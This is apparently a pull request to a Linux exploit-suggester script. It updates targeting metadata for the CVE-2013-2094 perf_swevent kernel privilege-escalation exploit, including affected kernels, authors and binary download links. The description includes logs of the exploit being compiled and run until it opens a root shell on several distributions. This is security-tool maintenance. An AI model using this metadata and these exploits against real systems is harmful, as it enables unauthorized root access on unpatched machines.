### PR TITLE
Update info for perf_swevent exploit

### DIFF
--- a/linux-exploit-suggester.sh
+++ b/linux-exploit-suggester.sh
@@ -450,7 +450,7 @@ EOF
 EXPLOITS[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent
 Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
-Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64}
+Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
 Rank: 1
 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
 bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent

--- a/linux-exploit-suggester.sh
+++ b/linux-exploit-suggester.sh
@@ -449,13 +449,15 @@ EOF
 
 EXPLOITS[((n++))]=$(cat <<EOF
 Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent
-Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9
-Tags: RHEL=6,ubuntu=12.04
+Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
+Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64}
 Rank: 1
 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
 bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent
 bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent64
 exploit-db: 26131
+author: Andrea 'sorbo' Bittau
+Comments: No SMEP/SMAP bypass
 EOF
 )
 
@@ -467,6 +469,8 @@ Rank: 1
 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
 src-url: https://cyseclabs.com/exploits/vnik_v1.c
 exploit-db: 33589
+author: Vitaly 'vnik' Nikolenko
+Comments: No SMEP/SMAP bypass
 EOF
 )
 


### PR DESCRIPTION
Tested:

* Ubuntu 14.04 (x64)
* Ubuntu 14.04.1 (x64)
* Fedora 16 (x64)
* Fedora 17 (x64)
* Debian 7 (x64)

Note: SMEP was disabled for testing.

```
user@ubuntu-12-x64:~/Desktop/linux-exploit-suggester$ uname -a
Linux ubuntu-12-x64 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-12-x64:~/Desktop/linux-exploit-suggester$ gcc 26131.c 
user@ubuntu-12-x64:~/Desktop/linux-exploit-suggester$ ./a.out 
Searchin...
perf open ffffffff [-1]
detected CONFIG_JUMP_LABEL
perf_swevent_enabled is at 0xffffffff81ef67e0
IDT at 0xffffffff81dd7000
Using interrupt 0
Offset ffffffffffff4057
Shellcode at 0x81000000
Triggering sploit
perf open ffffffffffff4057 [-49065]
Got signal
Launching shell
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(user)
# 
user@ubuntu-12-x64:~/Desktop/linux-exploit-suggester$ 
```

```
[user@localhost linux-exploit-suggester]$ uname -a
Linux localhost.localdomain 3.1.0-7.fc16.x86_64 #1 SMP Tue Nov 1 21:10:48 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
[user@localhost linux-exploit-suggester]$ gcc -O2 26131.c -o 26131
[user@localhost linux-exploit-suggester]$ ./26131 
Searchin...
detected CONFIG_JUMP_LABEL
perf_swevent_enabled is at 0xffffffff81d6acb0
IDT at 0xffffffff81c55000
Using interrupt 4
Shellcode at 0x81000000
Triggering sploit
Got signal
Launching shell
sh-4.2# id
uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# ^C
sh-4.2# exit
[user@localhost linux-exploit-suggester]$ 
```

```
[user@fedora17 Desktop]$ uname -a
Linux fedora17.local 3.3.4-5.fc17.x86_64 #1 SMP Mon May 7 17:29:34 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[user@fedora17 Desktop]$ ./exp 
Searchin...
detected CONFIG_JUMP_LABEL
perf_swevent_enabled is at 0xffffffff81d05460
IDT at 0xffffffff81bdd000
Using interrupt 4
Shellcode at 0x81000000
Triggering sploit
Got signal
Launching shell
sh-4.2# id
uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
[user@fedora17 Desktop]$ 
```

```
user@debian-7-0-0-desktop-x64:~/Desktop/linux-exploit-suggester$ uname -a
Linux debian-7-0-0-desktop-x64 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2 x86_64 GNU/Linux
user@debian-7-0-0-desktop-x64:~/Desktop/linux-exploit-suggester$ ./a.out 
Searchin...
perf_swevent_enabled is at 0xffffffff817dbb00
IDT at 0xffffffff8172d000
Using interrupt 0
Shellcode at 0x81000000
Triggering sploit
Got signal
Launching shell
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),105(scanner),110(bluetooth),112(netdev),1000(user)
# 
user@debian-7-0-0-desktop-x64:~/Desktop/linux-exploit-suggester$ 
```
